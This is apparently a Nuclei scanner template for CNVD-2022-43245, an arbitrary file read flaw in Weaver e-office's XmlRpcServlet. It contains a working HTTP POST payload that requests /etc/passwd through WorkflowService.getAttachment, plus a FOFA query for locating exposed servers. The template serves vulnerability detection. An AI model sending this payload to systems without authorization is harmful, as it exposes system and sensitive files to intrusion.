id: CNVD-2022-43245

info:
  name: Weaver OA XmlRpcServlet - Arbitary File Read
  author: SleepingBag945
  severity: high
  description: |
    e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.
  classification:
    cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: weaver
    product: e-office
    fofa-query: app="泛微-协同办公OA"
  tags: cnvd,cnvd2022,weaver,e-office,oa,lfi

http:
  - raw:
      - |
        POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" encoding="UTF-8"?><methodCall>
        <methodName>WorkflowService.getAttachment</methodName>
        <params><param><value><string>/etc/passwd</string>
        </value></param></params></methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<methodResponse><params><param><value><base64>"

      - type: word
        part: header
        words:
          - "text/xml"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009c70a7089c6550b8260d9216160b968d3ce9183f794ab0b572528ba059097ef3022100d5ea494837f0d6e28bd0baf175ebb7b9e6c99c8b06eba05d4cd0b12b0cb1e95c:922c64590222798bb761d5b6d8e72950